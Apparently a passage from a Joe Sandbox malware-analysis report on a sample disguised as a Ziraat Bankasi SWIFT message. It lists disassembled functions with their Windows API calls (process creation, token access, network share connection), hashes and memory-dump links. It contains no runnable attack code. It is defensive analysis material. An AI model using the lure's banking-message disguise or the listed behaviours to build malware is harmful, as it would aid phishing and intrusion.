Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
Instruction ID: 7bb8b4582bb3022b83f95c9a52ad47b4d9919ca7b61c2469c987b74df4de781b
Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
Instruction Fuzzy Hash: F701493200014EBBCF625E84DC118EE3F67BB18355B588455FE2859132D336DAB2AB81

Function 000A7452 Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 000A7A0D: __getptd_noexit.LIBCMT ref: 000A7A0E

__lock.LIBCMT ref: 000A748F
InterlockedDecrement.KERNEL32(?), ref: 000A74AC
_free.LIBCMT ref: 000A74BF
InterlockedIncrement.KERNEL32(00CF2AD8), ref: 000A74D7

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
String ID:
API String ID: 2704283638-0
Opcode ID: 50ffad5a3339baef60f7cd39cad712919c6437ce426785caad650b0b8af7cb0b
Instruction ID: 5050acd2dc11e74cf73e566addffabf4162994699b7767fe62e8fa116033a057
Opcode Fuzzy Hash: 50ffad5a3339baef60f7cd39cad712919c6437ce426785caad650b0b8af7cb0b
Instruction Fuzzy Hash: 3701843190AA11ABC762AFE4AD057DDBBA0BF0A721F15C019F458A7A91CB245981CFD2

Function 000EDFDE Relevance: 6.0, APIs: 4, Instructions: 44COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 000EDFF7
ScreenToClient.USER32(?,?), ref: 000EE00F
ScreenToClient.USER32(?,?), ref: 000EE033
InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,00000000), ref: 000EE04E

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: ClientRectScreen$InvalidateWindow
String ID:
API String ID: 357397906-0
Opcode ID: 4630f4b90108b3a6f14d8f64f0587f06ab78dccf626d59711d4cb17ec800b524
Instruction ID: 5dd5561230bacbac722dd3ebcf003e2f52e9f17a0534599f171541d5022318c0
Opcode Fuzzy Hash: 4630f4b90108b3a6f14d8f64f0587f06ab78dccf626d59711d4cb17ec800b524
Instruction Fuzzy Hash: 1A1150B9D00209EFDB41CF98D8849EEBBF9FB08310F108166E965E3210D775AA94CF50

Function 000A7A94 Relevance: 6.0, APIs: 4, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

__lock.LIBCMT ref: 000A7AD8

Part of subcall function 000A7CF4: __mtinitlocknum.LIBCMT ref: 000A7D06
Part of subcall function 000A7CF4: EnterCriticalSection.KERNEL32(00000000,?,000A7ADD,0000000D), ref: 000A7D1F

InterlockedIncrement.KERNEL32(?), ref: 000A7AE5
__lock.LIBCMT ref: 000A7AF9
___addlocaleref.LIBCMT ref: 000A7B17

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
String ID:
API String ID: 1687444384-0
Opcode ID: f6b45025ca1f9af31786b88e37e63f3e624b3eab3419486549fe0ef88a2814e0
Instruction ID: d226e0a8344ecea1950f922cc8945185fd28c62e4296d3b661afcc23929bc686
Opcode Fuzzy Hash: f6b45025ca1f9af31786b88e37e63f3e624b3eab3419486549fe0ef88a2814e0
Instruction Fuzzy Hash: ED016DB1504B00DFD720DFB5D90678AB7F0EF51321F20890EE4DA976A1CBB0A680CB11

Function 000EE32E Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 000EE33D
_memset.LIBCMT ref: 000EE34C
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00143D00,00143D44), ref: 000EE37B
CloseHandle.KERNEL32 ref: 000EE38D

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: _memset$CloseCreateHandleProcess
String ID:
API String ID: 3277943733-0
Opcode ID: 78e725b1ff1e4183c52d696f9f623c8e684496102e446e595e39fd9dc60dccdc
Instruction ID: 4d97b3e9619af68e21c468a36f0c86b16ff1ed7a3a4d0ad1ab6549d6fafe29d9
Opcode Fuzzy Hash: 78e725b1ff1e4183c52d696f9f623c8e684496102e446e595e39fd9dc60dccdc
Instruction Fuzzy Hash: 52F082F5940308BEE3101BE5AC45FB77E6CDB06758F404431FE18EA5B2D3B59E4086A8

Function 000EEA6A Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 0009AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0009AFE3
Part of subcall function 0009AF83: SelectObject.GDI32(?,00000000), ref: 0009AFF2
Part of subcall function 0009AF83: BeginPath.GDI32(?), ref: 0009B009
Part of subcall function 0009AF83: SelectObject.GDI32(?,00000000), ref: 0009B033

MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 000EEA8E
LineTo.GDI32(00000000,?,?), ref: 000EEA9B
EndPath.GDI32(00000000), ref: 000EEAAB
StrokePath.GDI32(00000000), ref: 000EEAB9

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: 40930aa2e6b393887ff8781cbf92feeb805678392d8b4485678b7bf624d1bc45
Instruction ID: 830c46213fcb8364069e57fc9276ac290bfdc726ce5f899a9c1ae9c797339746
Opcode Fuzzy Hash: 40930aa2e6b393887ff8781cbf92feeb805678392d8b4485678b7bf624d1bc45
Instruction Fuzzy Hash: 92F05E31005299BBDB12AF94EC09FCE3F59AF06321F184101FE55614E187B49591DBD6

Function 000BC82D Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 000BC84A
GetWindowThreadProcessId.USER32(?,00000000), ref: 000BC85D
GetCurrentThreadId.KERNEL32 ref: 000BC864
AttachThreadInput.USER32(00000000), ref: 000BC86B

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: 0790ef8c7443e611b840124037f01e7b80086aad756bb61fb719b41fda928151
Instruction ID: 519c789ec65ae6664d044c1658014b838466172fe630b3ebac4e20b3f173530d
Opcode Fuzzy Hash: 0790ef8c7443e611b840124037f01e7b80086aad756bb61fb719b41fda928151
Instruction Fuzzy Hash: 4AE0E57154122476EB215FA1EC0DEDB7F5CEF157A1F408015B54D95850CAB2C5C1D7E0

Function 000BB0CD Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 000BB0D6
OpenThreadToken.ADVAPI32(00000000), ref: 000BB0DD
GetCurrentProcess.KERNEL32(00000028,?), ref: 000BB0EA
OpenProcessToken.ADVAPI32(00000000), ref: 000BB0F1

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: f0c12c12ff77a043cc68fd73506625bca6313bbfc0033dd6d0f02a58ef51a964
Instruction ID: c4566efed9e5ce05d03e4fe96a8e0932ff37802a0000fc62b8d0b38ab3df5c0f
Opcode Fuzzy Hash: f0c12c12ff77a043cc68fd73506625bca6313bbfc0033dd6d0f02a58ef51a964
Instruction Fuzzy Hash: 68E086726012119BD7602FF16C0CB973BECEF55791F018818F2C5DA040DFB48481C760

Function 0009B47D Relevance: 6.0, APIs: 4, Instructions: 22COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 0009B496
SetTextColor.GDI32(?,000000FF), ref: 0009B4A0
SetBkMode.GDI32(?,00000001), ref: 0009B4B5
GetStockObject.GDI32(00000005), ref: 0009B4BD
GetWindowDC.USER32(?,00000000), ref: 000FDE2B
GetPixel.GDI32(00000000,00000000,00000000), ref: 000FDE38
GetPixel.GDI32(00000000,?,00000000), ref: 000FDE51
GetPixel.GDI32(00000000,00000000,?), ref: 000FDE6A
GetPixel.GDI32(00000000,?,?), ref: 000FDE8A
ReleaseDC.USER32(?,00000000), ref: 000FDE95

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
String ID:
API String ID: 1946975507-0
Opcode ID: 349b139431122f400a8d8342534a09164f8671b193266e8e31a91c63463f8f27
Instruction ID: ec37e00568aa4957132e432e765ee091b6db04f735763efa0fe92fe5cd50d071
Opcode Fuzzy Hash: 349b139431122f400a8d8342534a09164f8671b193266e8e31a91c63463f8f27
Instruction Fuzzy Hash: 7AE0ED31100244AADF616BB4BC0DBE83F51AB55339F14C666FBA9584E1CBB18591EB11

Function 000BB2D4 Relevance: 6.0, APIs: 4, Instructions: 20synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 000BB2DF
UnloadUserProfile.USERENV(?,?), ref: 000BB2EB
CloseHandle.KERNEL32(?), ref: 000BB2F4
CloseHandle.KERNEL32(?), ref: 000BB2FC

Part of subcall function 000BAB24: GetProcessHeap.KERNEL32(00000000,?,000BA848), ref: 000BAB2B
Part of subcall function 000BAB24: HeapFree.KERNEL32(00000000), ref: 000BAB32

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: 487b8b8df215ebd27f682392c15c8eec06bbf43e589c53f7795f544c7a0ba629
Instruction ID: fe1c39a488de03fb89480c274b05812678bc39af5de0bba969a657e5e411f880
Opcode Fuzzy Hash: 487b8b8df215ebd27f682392c15c8eec06bbf43e589c53f7795f544c7a0ba629
Instruction Fuzzy Hash: 2EE0B67A104005BBCB012BE5EC08899FFB6FF893213109221F66581971CF72A8B1EB91

Function 000A3FAD Relevance: 6.0, APIs: 4, Instructions: 14threadCOMMON

Download Yara Rule

APIs

__getptd_noexit.LIBCMT ref: 000A3FAE

Part of subcall function 000A7A25: GetLastError.KERNEL32(00000001,0009F507,000A7C13,000A39E3,?,?,0009F507,?,0000000E), ref: 000A7A27
Part of subcall function 000A7A25: __calloc_crt.LIBCMT ref: 000A7A48
Part of subcall function 000A7A25: GetCurrentThreadId.KERNEL32 ref: 000A7A71
Part of subcall function 000A7A25: SetLastError.KERNEL32(00000000,0009F507,?,0000000E), ref: 000A7A89

CloseHandle.KERNEL32(?,?,000A3F8D), ref: 000A3FC2
__freeptd.LIBCMT ref: 000A3FC9
ExitThread.KERNEL32 ref: 000A3FD1

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: ErrorLastThread$CloseCurrentExitHandle__calloc_crt__freeptd__getptd_noexit
String ID:
API String ID: 408300095-0
Opcode ID: aba81701fed2303e9e581a7bda48ef9a4ed8c42647c3c5328da30fac4f2d0046
Instruction ID: 534775a5aba275b050c6576514433236b6d38bef53574ef3945457ab7977324b
Opcode Fuzzy Hash: aba81701fed2303e9e581a7bda48ef9a4ed8c42647c3c5328da30fac4f2d0046
Instruction Fuzzy Hash: 46D0A731445E105FC57127E0AC0965E77A07F02721B049325F069094E2CF604A418682

Function 000BDCDF Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 240comCOMMON

Download Yara Rule

APIs

OleSetContainedObject.OLE32(?,00000001), ref: 000BDEAA

Strings

Container, xrefs: 000BDE29
AutoIt3GUI, xrefs: 000BDE22

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: ContainedObject
String ID: AutoIt3GUI$Container
API String ID: 3565006973-3941886329
Opcode ID: 674d2f804e65c1031d27cc7759d23cd0173db83a07676285a4fbbbcab82883d5
Instruction ID: 0c882a820f467b865bffd11e7f89a301bd2ffe35e16aee675e97db13b2ac3b83
Opcode Fuzzy Hash: 674d2f804e65c1031d27cc7759d23cd0173db83a07676285a4fbbbcab82883d5
Instruction Fuzzy Hash: E1913770600602AFDB64DF64C884BAAB7F5FF48714F10846EF84ADB291EB71E841CB60

Function 000CDE7C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 200shareCOMMON

Download Yara Rule

APIs

Part of subcall function 0009C6F4: _wcscpy.LIBCMT ref: 0009C717

Part of subcall function 0008936C: __swprintf.LIBCMT ref: 000893AB
Part of subcall function 0008936C: __itow.LIBCMT ref: 000893DF

__wcsnicmp.LIBCMT ref: 000CDEFD
WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 000CDFC6

Strings

LPT, xrefs: 000CDEF7

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
String ID: LPT
API String ID: 3222508074-1350329615
Opcode ID: a4a3a71566bc987368cadcbdad92ce0c11e8570fd28f8b02f91d1d6eff333f61
Instruction ID: c44deaac78cbde90532f4689e1a58d64565e7d7dfc87355049ecee1c52011fd4
Opcode Fuzzy Hash: a4a3a71566bc987368cadcbdad92ce0c11e8570fd28f8b02f91d1d6eff333f61
Instruction Fuzzy Hash: D0616975A00215AFCB14EF98C891FEEB7F4BB18310F15406EF546AB291DB70AE81DB90

Function 0009BCC9 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 0009BCDA
GlobalMemoryStatusEx.KERNEL32 ref: 0009BCF3

Strings

@, xrefs: 0009BCE8

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: dc09fa62c3c5d1fb90db05adec4a32c403902e5ceffaa8ed72fe830cce4e2ddc
Instruction ID: cf2a99d324237b1fe3275df778803df2d01eda53cc36052933421d774a95de60
Opcode Fuzzy Hash: dc09fa62c3c5d1fb90db05adec4a32c403902e5ceffaa8ed72fe830cce4e2ddc
Instruction Fuzzy Hash: 695136B1409744ABE720AF54EC86BAFBBE8FF94354F41484EF5C8410A2DB7185A8D752

Function 000CC56D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137COMMON

Download Yara Rule

APIs

Part of subcall function 000844ED: __fread_nolock.LIBCMT ref: 0008450B

_wcscmp.LIBCMT ref: 000CC65D
_wcscmp.LIBCMT ref: 000CC670

Strings

FILE, xrefs: 000CC5A5

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: _wcscmp$__fread_nolock
String ID: FILE
API String ID: 4029003684-3121273764
Opcode ID: 74c774d4d381af26e6e40940b6489d43de76da382582b58762ccbb0cf37a90f6
Instruction ID: 03e856acee9540df9195e423cb5b5068e4da8ca0576cfecb8708714ac8758cc1
Opcode Fuzzy Hash: 74c774d4d381af26e6e40940b6489d43de76da382582b58762ccbb0cf37a90f6
Instruction Fuzzy Hash: B341B472A0021ABBDF21ABA4DC42FEF77B9EF49714F000469F645EB182D7759A04CB61

Function 000C5157 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 87windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 000C51C6
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 000C5201

Strings

0, xrefs: 000C51BF

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: c6b471d5354e3d7c1e34bfaebb54f683ecfb02a83d1e89a9cc33e8de8e1b46c2
Instruction ID: 27ab53acb66826d21b45f1b90564b3c5cf33ad9193d7a8e834054ee8b8ab855f
Opcode Fuzzy Hash: c6b471d5354e3d7c1e34bfaebb54f683ecfb02a83d1e89a9cc33e8de8e1b46c2
Instruction Fuzzy Hash: FA31D239600705ABEB64CF99DC45FAEBBF8BF46352F14401DE981A61A1E770AAC4DB10

Function 000EDA42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71COMMON

Download Yara Rule

APIs

Part of subcall function 0009B34E: GetWindowLongW.USER32(?,000000EB), ref: 0009B35F

GetActiveWindow.USER32 ref: 000EDA7B
EnumChildWindows.USER32(?,000ED75F,00000000), ref: 000EDAF5

Strings

T1, xrefs: 000EDAFB

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Window$ActiveChildEnumLongWindows
String ID: T1
API String ID: 3814560230-739779697
Opcode ID: de62aa50931986ba9a809ebddd1571bfbc80cd0fcbd73b2f9b7b4e40957bb0ce
Instruction ID: 9f1bb85bd2191c4a2f3b17f8f2973fe09d385adbbf23bb4143556e5f87c824dd
Opcode Fuzzy Hash: de62aa50931986ba9a809ebddd1571bfbc80cd0fcbd73b2f9b7b4e40957bb0ce
Instruction Fuzzy Hash: 9F214F79604201EFC754DF29E850AA673F5EF4A320F1A0619F969973F0E770A880DF50

Function 000C5262 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 000C52D5
GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 000C52F4

Strings

0, xrefs: 000C52CE

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
